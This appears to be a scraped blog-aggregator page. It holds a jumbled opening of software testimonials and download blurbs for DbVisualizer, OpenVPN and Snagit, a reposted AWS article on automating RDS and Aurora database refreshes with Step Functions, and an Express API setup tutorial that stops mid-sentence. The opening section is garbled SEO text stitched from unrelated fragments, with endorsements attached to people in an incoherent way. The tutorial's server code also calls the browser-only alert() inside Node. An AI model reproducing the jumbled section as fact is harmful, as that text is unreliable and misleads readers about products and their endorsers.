Michael Leo, Owner at Kettle River Consulting Inc
It will make your daily work easier
I am a product integration developer in a database company. I use DbVisualizer as a default SQL client on my daily work for performing compatibility tests between databases and testing our integration extensions. I like its user-friendly interface and rich feature set. The feature that it saves settings between the sessions is the most I like. If you interact with databases, use DbVisualizer! It will make your daily work easier.
Openvpn client software for mac. Alternative: Viscosity OpenVPN client. Another good OpenvPN client created by an external party, SparkLabs. It is available for Windows and macOS. It is compatible with OpenVPN Access Server. It can be obtained from the SparkLabs Viscosity website. There are too many to name. Downloading and installing the OpenVPN Connect Client for macOS. Navigate to the OpenVPN Access Server client web interface. Login with your credentials. Click on the Mac icon to begin download. Wait until the download completes, and then open it (the exact procedure varies a bit per browser). Open the ‘OpenVPN Connect installer’ to start the installation. Click ‘Continue’. Please read the licensing terms.
Snagit 2020 offers a free trial version that allows you to test a limited version of the software for 15 days, with no credit card required. To access all of Snagit's features for an extended period, there are paid-for versions of the software available. The Snagit app is available to download on Mac, Windows or Linux. Download Snagit 2021.0.2 for Mac from our software library for free. The actual developer of this software for Mac is TechSmith Corporation. Snagit is developed for Mac OS X 10.8.0 or later. The most popular versions among Snagit for Mac users are 3.2, 2.3 and 2.1. Snagit for mac full. free download. Free SnagIt is the solution you are looking for to capture any element on your screen. The first difference with the other captors is that SnagIt allows you to capture any video image without. Snagit is an intuitive tool that can help you take all kinds of screen shots for personal and professional use. It's free to try for the first ten image saves, and if you'd like to keep using it.
Muhammet Orazov, Software Engineer at Exasol
It works like a charm
Since I teach and use 3 database engines, it is the perfect tool to switch among them. I use it for SQL, PL-SQL and T-SQL development. I also use it in my common DBA tasks, either through graphical interface or by SQL script. It is reliable and I trust in its results.
Multicultural marketinghow inclusiveness drives demand. José Aser, Database Teacher at Lusophone University Portugal
Tumblr media
0 notes
globalmediacampaign · 4 years ago
Text
Orchestrating database refreshes for Amazon RDS and Amazon Aurora
The database refresh process consists of recreating of a target database using a consistent data copy of a source database, usually done for test and development purposes. Fully-managed database solutions such as Amazon Relational Database Service (Amazon RDS) or Amazon Aurora make it incredibly easy to do that. However, database administrators may need to run some post-refresh activities such as data masking or password changes, or they may need to orchestrate multiple refreshes because they manage several databases, each of them with more than one environment. In some cases, refreshes have to be performed frequently, even daily. In this post, we describe the features of a serverless solution that you can use to perform database refresh operations at scale, with a higher level of automation. This solution can be deployed and tested using the instructions available in the GitHub repo. In the next section, we go over what you’re going to build. Potential use cases The solution described in this post enables you to do the following: Refresh an existing database (or create a new one) using one of the four options available: Latestpoint – The data is aligned to the latest point in time. torestorepoint – The data is aligned to a specified point in time. fromsnapshot – The data is aligned at the snapshot creation time. fast-cloning (only for Aurora) – The data is aligned to the latest point in time, but it’s cloned using the fast-cloning feature provided by Aurora. Refresh an existing encrypted database (or create a new one). A cross-account use case has the following considerations: The only options available are fromsnapshot or fast-cloning (only for Aurora). The AWS Key Management Service (AWS KMS) primary key (managed by the source account) must be manually shared with the target AWS account before launching the refresh. Perform a cross-account refresh of an existing database (or create a new one). As a pre-requisite, the source account has to share with the target account the Amazon RDS or Aurora snapshot or the source Aurora cluster, before launching the refresh process. Run post-refresh SQL scripts against the new refreshed database (only available for Amazon RDS for MariaDB, Amazon RDS for MySQL and Aurora MySQL) to perform the following: Clearing, masking, or modifying sensitive data coming from the source production database. Deleting unnecessary data or removing unnecessary objects coming from the source production database. Customize the solution by adding or removing steps to orchestrate operations for those applications that have different requirements, using the same state machine. Keep the history of all the database refresh operations of your applications, in order to answer questions such as: When has my database last been refreshed? Does my application have all its non-production databases refreshed? Is the refresh that I launched yesterday complete? Prerequisites The solution implemented focuses on a time-consuming administrative task that DBAs have to deal with: the database refresh. The process consists of recreating an existing database. Typically, this is a copy used for test and development purposes whose data has to be “refreshed”. You can use a backup or the last available image of the related production environment to refresh a database. The solution can also be applied to scenarios when you create a new environment from scratch. The process can involve additional steps to apply different settings or configurations to the new refreshed database. The following diagram illustrates the process. The backup can be either logical (a partial or full export the source dataset) or physical (a binary copy of the database, which can be full, incremental, whole, or partial). The solution described in this post allows you to use physical backups (Amazon RDS or Aurora snapshots) during the restore process or the Aurora cloning feature in order to copy your databases. Solution overview The solution uses several AWS services to orchestrate the refresh process: Amazon Aurora – A MySQL-and PostgreSQL-compatible relational database built for the cloud. The solution uses Aurora snapshots or the fast cloning feature to restore Aurora database instances. Restores are performed using APIs provided by RDS and Aurora. Amazon DynamoDB – A fully-managed key-value and document database that delivers single-digit millisecond performance at any scale. We use it to keep track of all the refresh operations run by this solution. Amazon Elastic Compute Cloud – Amazon EC2 provides secure, resizable compute capacity in the cloud. The solution uses it in conjunction with AWS Systems Manager to run SQL scripts against your restored databases. AWS Lambda – Lambda lets you run code without provisioning or managing servers. You pay only for the compute time you consume. Lambda functions are used to implement all the steps of a database refresh. AWS Step Functions – A serverless function orchestrator that makes it easy to sequence AWS Lambda functions and multiple AWS services into business-critical applications. This is the core service of the solution, used to orchestrate database refreshes. Amazon RDS – A fully managed relational database solution that provides you with six familiar databases. The solution uses Amazon RDS snapshots to restore RDS databases instances. Restores are performed using APIs provided by RDS and Auroras. Amazon Simple Notification Service – Amazon SNS is a fully managed messaging service for both systems-to-system and app-to-person communication. We use it to notify users about the completion of refresh operations. Amazon Simple Storage Service – Amazon S3 is an object storage service that offers industry-leading scalability, data availability, security and performance. We use it to store the SQL scripts that the solution allows you to run against new restored databases. AWS Secrets Manager – Secrets Manager helps you to securely encrypt, store, and retrieve credentials for your database and other services. We use it to manage the access credentials of the databases involved in your refreshes. AWS Systems Manager – Systems Manager organizes, monitors and automates management tasks on your AWS resources. With Systems Manager Run Command, you can optionally run SQL scripts stored on Amazon S3 against your restored databases. This solution may incur costs; check the pricing pages related to the services you’re using. Architecture The architecture of the solution proposed is shown in the following diagram. The pre-restore workflow has the following steps: The end user prepares the refresh file (described later in this post) by configuring which steps have to be performed (including the optional creation of a Secrets Manager secret). If necessary, the end user can also prepare SQL scripts, stored on Amazon S3, to run as post-refresh scripts.  The restore workflow has the following steps: The end user initiates the refresh process by starting the Step Functions state machine (the refresh process could be initiated automatically, if needed). The state machine manages each step of the database restore by invoking Lambda functions that are part of this solution  The post-restore workflow includes the following steps: When the restore is complete, the state machine runs the post-restore SQL scripts. It provides two options: The state machine can run the scripts, stored on Amazon S3, through a Lambda function. If configured, you can use Secrets Manager to store and manage the database credentials. The state machine can run the scripts, stored on Amazon S3, using an EC2 instance, through Systems Manager Run Command. The state machine uses a DynamoDB table to store information about the process and its status. The state machine notifies the end user about the process final status using Amazon SNS. Steps of a database refresh Before describing in more detail what the solution looks like and how it works, it’s important to understand at a high level the main steps that are part of a database refresh: A backup of the source database is created. If the target database already exists, it’s stopped or, in most of the cases, deleted. The target database is re-created through a database restore operation, using the backup from Step 1. Post-restore scripts are run against the new restored target database. The Step Functions state machine implemented for this solution is composed by several states; most of them are related to specific steps of a database refresh operation. In particular, some states are required only for Amazon RDS, others only for Aurora, and others are required for both. The following table lists the main steps related to a refresh of an RDS DB instance performed by our solution. Step # Step Name Description 1 delete-replicas Deletes the existing read replicas of the target database 2 stop-old-database Stops the existing target database 3 perform-restore Performs the restore 4 delete-old-database Deletes the old target database 5 rename-database Renames the new target database 6 fix-tags Updates the tags of the new target database 7 create-read-replicas Re-creates the read replicas previously deleted 8 change-admin-pwd Changes the admin password of the new target database 9 rotate-admin-pwd Rotates the admin password within the secret for the new target database 10 runscripts Runs SQL scripts against the new target database 11 update-dynamodb Updates a DynamoDB table with some information about the refresh completed 12 send-msg Sends an SNS notification (e-mail) about the completion of the refresh The following table lists the main steps related to a refresh of an Aurora cluster performed by our solution. Step # Step Name Description 1 delete-replicas Deletes the existing read replicas of the target database 2 perform-restore Performs the restore (it only creates the cluster) 3 create-instance Creates a new instance within the cluster restored at Step 2 4 delete-old-database Deletes the old target DB instance 5 delete-old-cluster Deletes the old target cluster 6 rename-cluster Renames the new target cluster 7 rename-database Renames the new target database 8 fix-tags Updates the tags of the new target database 9 create-read-replicas Re-creates the read replicas previously deleted 10 change-admin-pwd Changes the admin password of the new target database 11 rotate-admin-pwd Rotates the admin password within the secret for the new target database 12 runscripts Runs SQL scripts against the new target database 13 update-dynamodb Updates a DynamoDB table with some information about the refresh completed 14 send-msg Sends an SNS notification (e-mail) about the completion of the refresh The graphic representation of the Step Function state machine that contains all the states mentioned above is available on the GitHub repo. You can use it on RDS DB instances, Aurora clusters, or both. The job poller strategy One of the main challenges of implementing an orchestrator with serverless services is to manage their stateless nature. When a certain operation is performed by a Lambda function against a database, how can we know when the operation is complete? The job poller strategy is a good solution. The following image is an extract from the solution showing this mechanism: For most of the steps that are part of a database refresh, we implement the same strategy: Step Functions invokes a Lambda function that performs a certain operation (such as restore a database). Step Functions waits a certain number of seconds (you configure) using the state of “Wait”. Step Functions invokes a Lambda function that checks if the operation has completed (if the database has been restored and its status is “available”). Step Functions verifies the results of the previous check using the state type “Choice”. Step Functions goes to the next state if the operation has completed; otherwise it waits again (returns to Step 2). Configuring your database refresh The steps of the database refresh are orchestrated by a Step Functions state machine based on an input file provided – the “refresh file”. It’s a JSON document containing all the input parameters for the state machine (in particular for the Lambda functions associated to the state machine states) which determines the characteristics of the refresh. A refresh file contains information about a specific refresh, so ideally for a single production database with two different non-production environments (one for development and one for test), a DBA has to prepare two refresh files. After these files are defined, they’re ready to be used and the related refresh can be scheduled or automated. The following code is the high-level structure of a refresh file: { "comment": "", "": { "": "", "": "", "": "", [..] "wait_time": , "check": { "": "", "": "", "checktodo": "", "torun": "true|false" }, "torun": "true|false" }, "": { "": "", "": "", "": "", [..] "wait_time": , "torun": "true|false" }, [..] } The file contains an element for every state machine’s state that needs an input. For more information about defining it, see the GitHub repo. Keep in mind the following about the refresh file: Not all the elements are required; some of them are related to steps that you may not want to run during a database refresh. Some elements are only related to Amazon RDS, others only to Aurora. Each element has a “torun” attribute that you can set to “false” in case you want to skip the related step. Each element has a “wait_time” attribute that determines for how long the state machine has to wait before checking whether the related operation or step is complete. Some elements have a “check” section that contains the input parameters for the Lambda function that verify whether a certain step completed successfully. This section has a “torun” parameter as well. Within an element, some parameters are required and others are optional. Within an element, some parameters are related to each other; if one has a value, the other one will become is also required. In this post, we show you three examples of elements related to three different steps of a database refresh. The following code shows a refresh of an RDS DB instance to the latest point: [..] "restore": { "dbservice": "rds", "source": "mysqlinstp", "target": "mysqlinstd", "restoretype": "latestpoint", "application": "app1", "environment": "development", "port": 3307, "subgrp": "db-sub-grp-virginia", "iamdbauth": "False", "cwalogs": "audit,error,general,slowquery", "copytagstosnap": "True", "dbparamgrp": "default.mysql5.7", "deletionprotection": "False", "secgrpids": "sg-03aa3aa1590daa4d8", "multiaz": "False", "dbname": "mysqlinstd", "dbclass": "db.t3.micro", "autominor": "False", "storagetype": "gp2", "wait_time": 60, "check": { "dbservice": "rds", "dbinstance": "mysqlinstdtemp", "checktodo": "checkrestore", "torun": "true" }, "torun": "true" } [..] The preceding section of the refresh file indicates that an RDS for MySQL DB instance “mysqlinstp” must be used as the source for the refresh to the latest point of the DB instance “mysqlinstd”. The section includes other information about the new database to be restored, including the security group ID, the storage type, the DB instance class. The state machine verifies every 60 seconds whether the restore operation is complete. In the “check” section, you can notice that a database is always restored with a name ending with the suffix “%temp”. This suffix is removed later with another step.  The following code illustrates how to rename an RDS for MySQL DB instance once restored: [..] "rename": { "dbservice": "rds", "dbinstance": "mysqlinstdtemp", "wait_time": 10, "check": { "dbservice": "rds", "dbinstance": "mysqlinstd", "checktodo": "checkrename", "torun": "true" }, "torun": "true" } [..] The preceding section of the refresh file indicates that the new restored RDS DB instance “mysqlinstdtemp” must be renamed to “mysqlinstd”. The state machine verifies every 10 seconds whether rename operation is complete. The following code runs post-refresh SQL scripts against a new restored RDS DB instance: [..] "runscripts": { "dbservice": "rds", "dbinstance": "mysqlinstd", "engine": "mysql", "access": "secret", "secretname": "/development/app1r/mysqlinstd", "method": "lambda", "bucketname": "awsolproj", "prefix": "rdsmysql/mysqlinstd", "keys": "00test.sql,01test.sql", "wait_time": 10, "check": { "dbservice": "rds", "bucketname": "awsolproj", "prefix": "rdsmysql/mysqlinstd", "checktodo": "runscripts", "torun": "true" }, "torun": "true" } [..] The preceding section of the refresh file indicates that the scripts “00test.sql” and “01test.sql” stored on Amazon S3 in the bucket “awsolproj” must be run through Lambda against the RDS for MySQL DB instance “mysqlinstd”. Database credentials are retrieved using Secrets Manager, and the status of the operation is verified every 10 seconds. Managing secrets At the end of the restore, the new database has the same passwords for all the users within the database, including the primary user. This situation could represent a problem from a security standpoint, and for this reason the Step Functions state machine includes the following two states: change-admin-pwd and rotate-admin-pwd. With change-admin-pwd, the password of the primary user is automatically changed with a new one specified in the refresh file. If a Secrets Manager secret is configured for that database, the secret can be synchronized as well. See the following code: [..] "changeadminpwd": { "dbservice": "rds", "dbinstance": "mysqlinstd", "temppwd": "temppwd123", "secret": "true", "secretname": "/development/app1/mysqlinstd", "wait_time": 15, "check": { "dbservice": "rds", "dbinstance": "mysqlinstd", "checktodo": "checkpwd", "torun": "true" }, "torun": "true" } [..] With rotate-admin-pwd, if a Secrets Manager secret is configured and it has the rotation settings enabled, the secret containing the primary user password is rotated: "rotateadminpwd": { "dbservice": "rds", "dbinstance": "mybetainstd", "secretname": "/development/gamma/mybetainstd", "wait_time": 15, "check": { "dbservice": "rds", "secretname": "/development/gamma/mybetainstd", "temppwd": "temppwd123", "checktodo": "rotatepwd", "torun": "true" }, "torun": "true" } The solution allows you to run post-refresh SQL scripts in two ways: Using Lambda Using Systems Manager Run Command and EC2 The first option is more suitable if you’re more familiar with Lambda and want to keep the solution’s infrastructure completely serverless. Otherwise, DBAs who are used to directly managing SQL scripts on a server can easily manage them through Systems Manager: scripts are downloaded from Amazon S3 to the EC2 instance that is part of the solution and run from there. In both cases, you have to store the scripts on Amazon S3. The following code is the section of the refresh file related to the “run-script-” state: "runscripts": { "dbservice": "aurora|rds", "cluster": "", "dbinstance": "", "engine": "aurora-mysql|mysql|mariadb|oracle|aurora-postgresql|postgresql", "access": "pwd|secret", "temppwd": "", "secretname": "", "method": "lambda|ec2", "bucketname": "", "prefix": "/", "keys": ",,", "wait_time": , "check": { "dbservice": "aurora|rds", "bucketname": "", "prefix": "/", "checktodo": "runscripts", "torun": "true" }, "torun": "true" } Within a SQL script, you can run SELECT, DDL (Data Definition Language), DML (Data Manipulation Language), and DCL (Data Control Language) statements. As of this writing, this feature is available only for MySQL-related databases (Amazon RDS for MySQL, Amazon RDS for MariaDB, and Aurora MySQL) Tracking and troubleshooting your database refresh Keeping track of database refreshes is important especially when you have to manage hundreds of production databases plus the related non-production ones. This solution uses an encrypted DynamoDB table to record information about databases refreshes, giving you the ability to quickly answer questions like the following: Which date is the data of this database aligned to? When was the last time we refreshed this database? From which source did this database copy? Did the refresh of this database run successfully yesterday? Considering the production database, what’s the status of the refreshes of its non-production databases? The current structure of the DynamoDB table is the following: Table name – dbalignement-awssol Partition key – dbinstance Sort key – restoredate Additional attributes – appname,environment,recordingtime,restoretype,snapshot,source,status As of this writing, the solution doesn’t provide any local secondary index (LSI) or global secondary index (GSI) for the table, but you can easily add new GSIs to increase the number of access patterns that can be satisfied based on your needs. If a database refresh fails for any reason, you can use different services to understand the reasons. You can easily monitor the runs of your state machines through the Step Functions API or through its dashboard. The graph inspector can immediately tell you at which state there was a failure or at which state the state machine got stuck. If you choose a state, you can also take a look at the related input and output. You can also monitor the output of the Lambda functions associated with the states of the solution. Lambda logs information about its runs in Amazon CloudWatch Logs, from which you can get more details about what happened during a certain operation. Get notified or verify the database refresh completion The solution uses Amazon SNS to send emails about the success or failure of the database refreshes performed. In case of success, some details about the database just refreshed are included in the message sent. The following code is the section of the refresh file related to the “sendmsg” state: "sendmsg": { "dbservice": "aurora|rds", "application": "", "environment": "", "dbinstance": "", "source": "", "restoretype": "fromsnapshot|restorepoint|latestpoint|fastcloning", "topicarn": "", "torun": "true|false" } This feature is optional. What’s next The solution could be improved in some aspects, especially in the submission of the information about the database refresh. As of this writing, the input to provide must be manually prepared, but in the future we’re thinking about providing a user interface through which you can create the related JSON files and immediately perform some pre-checks that can validate the information provided. Notifications are sent to users via Amazon SNS but another option could be to use Amazon Simple E-mail Service (Amazon SES) to get more detailed information about the refreshes performed by sending formatted e-mails with additional information attached about the new database just restored. As of this writing, the solution doesn’t support Amazon RDS for SQL Server, and running post-refresh SQL scripts is available only for MySQL-related engines. We’re working to include those features in the remaining engines. Conclusion In this post, we showed how you can automate database refresh operations using serverless technology. The solution described can help you increase the level of automation in your infrastructure; in particular it can help reduce the time spent for an important and critical maintenance activity such as database refreshes, allowing DBAs to focus more on what matters when they manage their Amazon RDS and Aurora databases on AWS. We’d love to hear what you think! If you have questions or suggestions, please leave a comment. About the Authors Paola Lorusso is a Specialist Database Solutions Architect based in Milan, Italy. She works with companies of all sizes to support their innovation initiatives in the database area. In her role she helps customers to discover database services and design solutions on AWS, based on data access patterns and business requirements. She brings her technical experience close to the customer supporting migration strategies and developing new solutions with Relational and NoSQL databases.   Marco Tamassia is a technical instructor based in Milan, Italy. He delivers a wide range of technical trainings to AWS customers across EMEA. He also collaborates in the creation of new courses such as “Planning & Designing Databases on AWS” and “AWS Certified Database – Specialty”. Marco has a deep background as a Database Administrator (DBA) for companies of all sizes (included AWS). This allows him to bring his database knowledge into classroom brining real world examples to his students.   https://aws.amazon.com/blogs/database/orchestrating-database-refreshes-for-amazon-rds-and-amazon-aurora/
0 notes
agilenano · 5 years ago
Text
Agilenano - News: How To Set Up An Express API Backend Project With PostgreSQL Chidi Orji 2020-04-08T11:00:00+00:002020-04-08T13:35:17+00:00
We will take a Test-Driven Development (TDD) approach and the set up Continuous Integration (CI) job to automatically run our tests on Travis CI and AppVeyor, complete with code quality and coverage reporting. We will learn about controllers, models (with PostgreSQL), error handling, and asynchronous Express middleware. Finally, we’ll complete the CI/CD pipeline by configuring automatic deploy on Heroku. It sounds like a lot, but this tutorial is aimed at beginners who are ready to try their hands on a backend project with some level of complexity, and who may still be confused as to how all the pieces fit together in a real project. It is robust without being overwhelming and is broken down into sections that you can complete in a reasonable length of time. Getting Started The first step is to create a new directory for the project and start a new node project. Node is required to continue with this tutorial. If you don’t have it installed, head over to the official website, download, and install it before continuing. I will be using yarn as my package manager for this project. There are installation instructions for your specific operating system here. Feel free to use npm if you like. Open your terminal, create a new directory, and start a Node.js project. # create a new directory mkdir express-api-template # change to the newly-created directory cd express-api-template # initialize a new Node.js project npm init Answer the questions that follow to generate a package.json file. This file holds information about your project. Example of such information includes what dependencies it uses, the command to start the project, and so on. You may now open the project folder in your editor of choice. I use visual studio code. It’s a free IDE with tons of plugins to make your life easier, and it’s available for all major platforms. You can download it from the official website. Create the following files in the project folder: README.md .editorconfig Here’s a description of what .editorconfig does from the EditorConfig website. (You probably don’t need it if you’re working solo, but it does no harm, so I’ll leave it here.) “EditorConfig helps maintain consistent coding styles for multiple developers working on the same project across various editors and IDEs.�� Open .editorconfig and paste the following code: root = true [*] indent_style = space indent_size = 2 charset = utf-8 trim_trailing_whitespace = false insert_final_newline = true The [*] means that we want to apply the rules that come under it to every file in the project. We want an indent size of two spaces and UTF-8 character set. We also want to trim trailing white space and insert a final empty line in our file. Open README.md and add the project name as a first-level element. # Express API template Let’s add version control right away. # initialize the project folder as a git repository git init Create a .gitignore file and enter the following lines: node_modules/ yarn-error.log .env .nyc_output coverage build/ These are all the files and folders we don’t want to track. We don’t have them in our project yet, but we’ll see them as we proceed. At this point, you should have the following folder structure. EXPRESS-API-TEMPLATE ├── .editorconfig ├── .gitignore ├── package.json └── README.md I consider this to be a good point to commit my changes and push them to GitHub. Starting A New Express Project Express is a Node.js framework for building web applications. According to the official website, it is a Fast, unopinionated, minimalist web framework for Node.js. There are other great web application frameworks for Node.js, but Express is very popular, with over 47k GitHub stars at the time of this writing. In this article, we will not be having a lot of discussions about all the parts that make up Express. For that discussion, I recommend you check out Jamie’s series. The first part is here, and the second part is here. Install Express and start a new Express project. It’s possible to manually set up an Express server from scratch but to make our life easier we’ll use the express-generator to set up the app skeleton. # install the express generator globally yarn global add express-generator # install express yarn add express # generate the express project in the current folder express -f The -f flag forces Express to create the project in the current directory. We’ll now perform some house-cleaning operations. Delete the file index/users.js. Delete the folders public/ and views/. Rename the file bin/www to bin/www.js. Uninstall jade with the command yarn remove jade. Create a new folder named src/ and move the following inside it: 1. app.js file 2. bin/ folder 3. routes/ folder inside. Open up package.json and update the start script to look like below. "start": "node ./src/bin/www" At this point, your project folder structure looks like below. You can see how VS Code highlights the file changes that have taken place. EXPRESS-API-TEMPLATE ├── node_modules ├── src | ├── bin │ │ ├── www.js │ ├── routes │ | ├── index.js │ └── app.js ├── .editorconfig ├── .gitignore ├── package.json ├── README.md └── yarn.lock Open src/app.js and replace the content with the below code. var logger = require('morgan'); var express = require('express'); var cookieParser = require('cookie-parser'); var indexRouter = require('./routes/index'); var app = express(); app.use(logger('dev')); app.use(express.json()); app.use(express.urlencoded({ extended: true })); app.use(cookieParser()); app.use('/v1', indexRouter); module.exports = app; After requiring some libraries, we instruct Express to handle every request coming to /v1 with indexRouter. Replace the content of routes/index.js with the below code: var express = require('express'); var router = express.Router(); router.get('/', function(req, res, next) { return res.status(200).json({ message: 'Welcome to Express API template' }); }); module.exports = router; We grab Express, create a router from it and serve the / route, which returns a status code of 200 and a JSON message. Start the app with the below command: # start the app yarn start If you’ve set up everything correctly you should only see $ node ./src/bin/www in your terminal. Visit http://localhost:3000/v1 in your browser. You should see the following message: { "message": "Welcome to Express API template" } This is a good point to commit our changes. The corresponding branch in my repo is 01-install-express. Converting Our Code To ES6 The code generated by express-generator is in ES5, but in this article, we will be writing all our code in ES6 syntax. So, let’s convert our existing code to ES6. Replace the content of routes/index.js with the below code: import express from 'express'; const indexRouter = express.Router(); indexRouter.get('/', (req, res) => res.status(200).json({ message: 'Welcome to Express API template' }) ); export default indexRouter; It is the same code as we saw above, but with the import statement and an arrow function in the / route handler. Replace the content of src/app.js with the below code: import logger from 'morgan'; import express from 'express'; import cookieParser from 'cookie-parser'; import indexRouter from './routes/index'; const app = express(); app.use(logger('dev')); app.use(express.json()); app.use(express.urlencoded({ extended: true })); app.use(cookieParser()); app.use('/v1', indexRouter); export default app; Let’s now take a look at the content of src/bin/www.js. We will build it incrementally. Delete the content of src/bin/www.js and paste in the below code block. #!/usr/bin/env node /** * Module dependencies. */ import debug from 'debug'; import http from 'http'; import app from '../app'; /** * Normalize a port into a number, string, or false. */ const normalizePort = val => { const port = parseInt(val, 10); if (Number.isNaN(port)) { // named pipe return val; } if (port >= 0) { // port number return port; } return false; }; /** * Get port from environment and store in Express. */ const port = normalizePort(process.env.PORT || '3000'); app.set('port', port); /** * Create HTTP server. */ const server = http.createServer(app); // next code block goes here This code checks if a custom port is specified in the environment variables. If none is set the default port value of 3000 is set on the app instance, after being normalized to either a string or a number by normalizePort. The server is then created from the http module, with app as the callback function. The #!/usr/bin/env node line is optional since we would specify node when we want to execute this file. But make sure it is on line 1 of src/bin/www.js file or remove it completely. Let’s take a look at the error handling function. Copy and paste this code block after the line where the server is created. /** * Event listener for HTTP server "error" event. */ const onError = error => { if (error.syscall !== 'listen') { throw error; } const bind = typeof port === 'string' ? `Pipe ${port}` : `Port ${port}`; // handle specific listen errors with friendly messages switch (error.code) { case 'EACCES': alert(`${bind} requires elevated privileges`); process.exit(1); break; case 'EADDRINUSE': alert(`${bind} is already in use`); process.exit(1); break; default: throw error; } }; /** * Event listener for HTTP server "listening" event. */ const onListening = () => { const addr = server.address(); const bind = typeof addr === 'string' ? `pipe ${addr}` : `port ${addr.port}`; debug(`Listening on ${bind}`); }; /** * Listen on provided port, on all network interfaces. */ server.listen(port); server.on('error', onError); server.on('listening', onListening); The onError function listens for errors in the http server and displays appropriate error messages. The onListening function simply outputs the port the server is listening on to the console. Finally, the server listens for incoming requests at the specified address and port. At this point, all our existing code is in ES6 syntax. Stop your server (use Ctrl + C) and run yarn start. You’ll get an error SyntaxError: Invalid or unexpected token. This happens because Node (at the time of writing) doesn’t support some of the syntax we’ve used in our code. We’ll now fix that in the following section. Configuring Development Dependencies: babel, nodemon, eslint, And prettier It’s time to set up most of the scripts we’re going to need at this phase of the project. Install the required libraries with the below commands. You can just copy everything and paste it in your terminal. The comment lines will be skipped. # install babel scripts yarn add @babel/cli @babel/core @babel/plugin-transform-runtime @babel/preset-env @babel/register @babel/runtime @babel/node --dev This installs all the listed babel scripts as development dependencies. Check your package.json file and you should see a devDependencies section. All the installed scripts will be listed there. The babel scripts we’re using are explained below: @babel/cli A required install for using babel. It allows the use of Babel from the terminal and is available as ./node_modules/.bin/babel. @babel/core Core Babel functionality. This is a required installation. @babel/node This works exactly like the Node.js CLI, with the added benefit of compiling with babel presets and plugins. This is required for use with nodemon. @babel/plugin-transform-runtime This helps to avoid duplication in the compiled output. @babel/preset-env A collection of plugins that are responsible for carrying out code transformations. @babel/register This compiles files on the fly and is specified as a requirement during tests. @babel/runtime This works in conjunction with @babel/plugin-transform-runtime. Create a file named .babelrc at the root of your project and add the following code: { "presets": ["@babel/preset-env"], "plugins": ["@babel/transform-runtime"] } Let’s install nodemon # install nodemon yarn add nodemon --dev nodemon is a library that monitors our project source code and automatically restarts our server whenever it observes any changes. Create a file named nodemon.json at the root of your project and add the code below: { "watch": [ "package.json", "nodemon.json", ".eslintrc.json", ".babelrc", ".prettierrc", "src/" ], "verbose": true, "ignore": ["*.test.js", "*.spec.js"] } The watch key tells nodemon which files and folders to watch for changes. So, whenever any of these files changes, nodemon restarts the server. The ignore key tells it the files not to watch for changes. Now update the scripts section of your package.json file to look like the following: # build the content of the src folder "prestart": "babel ./src --out-dir build" # start server from the build folder "start": "node ./build/bin/www" # start server in development mode "startdev": "nodemon --exec babel-node ./src/bin/www" prestart scripts builds the content of the src/ folder and puts it in the build/ folder. When you issue the yarn start command, this script runs first before the start script. start script now serves the content of the build/ folder instead of the src/ folder we were serving previously. This is the script you’ll use when serving the file in production. In fact, services like Heroku automatically run this script when you deploy. yarn startdev is used to start the server during development. From now on we will be using this script as we develop the app. Notice that we’re now using babel-node to run the app instead of regular node. The --exec flag forces babel-node to serve the src/ folder. For the start script, we use node since the files in the build/ folder have been compiled to ES5. Run yarn startdev and visit http://localhost:3000/v1. Your server should be up and running again. The final step in this section is to configure ESLint and prettier. ESLint helps with enforcing syntax rules while prettier helps for formatting our code properly for readability. Add both of them with the command below. You should run this on a separate terminal while observing the terminal where our server is running. You should see the server restarting. This is because we’re monitoring package.json file for changes. # install elsint and prettier yarn add eslint eslint-config-airbnb-base eslint-plugin-import prettier --dev Now create the .eslintrc.json file in the project root and add the below code: { "env": { "browser": true, "es6": true, "node": true, "mocha": true }, "extends": ["airbnb-base"], "globals": { "Atomics": "readonly", "SharedArrayBuffer": "readonly" }, "parserOptions": { "ecmaVersion": 2018, "sourceType": "module" }, "rules": { "indent": ["warn", 2], "linebreak-style": ["error", "unix"], "quotes": ["error", "single"], "semi": ["error", "always"], "no-console": 1, "comma-dangle": [0], "arrow-parens": [0], "object-curly-spacing": ["warn", "always"], "array-bracket-spacing": ["warn", "always"], "import/prefer-default-export": [0] } } This file mostly defines some rules against which eslint will check our code. You can see that we’re extending the style rules used by Airbnb. In the "rules" section, we define whether eslint should show a warning or an error when it encounters certain violations. For instance, it shows a warning message on our terminal for any indentation that does not use 2 spaces. A value of [0] turns off a rule, which means that we won’t get a warning or an error if we violate that rule. Create a file named .prettierrc and add the code below: { "trailingComma": "es5", "tabWidth": 2, "semi": true, "singleQuote": true } We’re setting a tab width of 2 and enforcing the use of single quotes throughout our application. Do check the prettier guide for more styling options. Now add the following scripts to your package.json: # add these one after the other "lint": "./node_modules/.bin/eslint ./src" "pretty": "prettier --write '**/*.{js,json}' '!node_modules/**'" "postpretty": "yarn lint --fix" Run yarn lint. You should see a number of errors and warnings in the console. The pretty command prettifies our code. The postpretty command is run immediately after. It runs the lint command with the --fix flag appended. This flag tells ESLint to automatically fix common linting issues. In this way, I mostly run the yarn pretty command without bothering about the lint command. Run yarn pretty. You should see that we have only two warnings about the presence of alert in the bin/www.js file. Here’s what our project structure looks like at this point. EXPRESS-API-TEMPLATE ├── build ├── node_modules ├── src | ├── bin │ │ ├── www.js │ ├── routes │ | ├── index.js │ └── app.js ├── .babelrc ├── .editorconfig ├── .eslintrc.json ├── .gitignore ├── .prettierrc ├── nodemon.json ├── package.json ├── README.md └── yarn.lock You may find that you have an additional file, yarn-error.log in your project root. Add it to .gitignore file. Commit your changes. The corresponding branch at this point in my repo is 02-dev-dependencies. Settings And Environment Variables In Our .env File In nearly every project, you’ll need somewhere to store settings that will be used throughout your app e.g. an AWS secret key. We store such settings as environment variables. This keeps them away from prying eyes, and we can use them within our application as needed. I like having a settings.js file with which I read all my environment variables. Then, I can refer to the settings file from anywhere within my app. You’re at liberty to name this file whatever you want, but there’s some kind of consensus about naming such files settings.js or config.js. For our environment variables, we’ll keep them in a .env file and read them into our settings file from there. Create the .env file at the root of your project and enter the below line: TEST_ENV_VARIABLE="Environment variable is coming across" To be able to read environment variables into our project, there’s a nice library, dotenv that reads our .env file and gives us access to the environment variables defined inside. Let’s install it. # install dotenv yarn add dotenv Add the .env file to the list of files being watched by nodemon. Now, create the settings.js file inside the src/ folder and add the below code: import dotenv from 'dotenv'; dotenv.config(); export const testEnvironmentVariable = process.env.TEST_ENV_VARIABLE; We import the dotenv package and call its config method. We then export the testEnvironmentVariable which we set in our .env file. Open src/routes/index.js and replace the code with the one below. import express from 'express'; import { testEnvironmentVariable } from '../settings'; const indexRouter = express.Router(); indexRouter.get('/', (req, res) => res.status(200).json({ message: testEnvironmentVariable })); export default indexRouter; The only change we’ve made here is that we import testEnvironmentVariable from our settings file 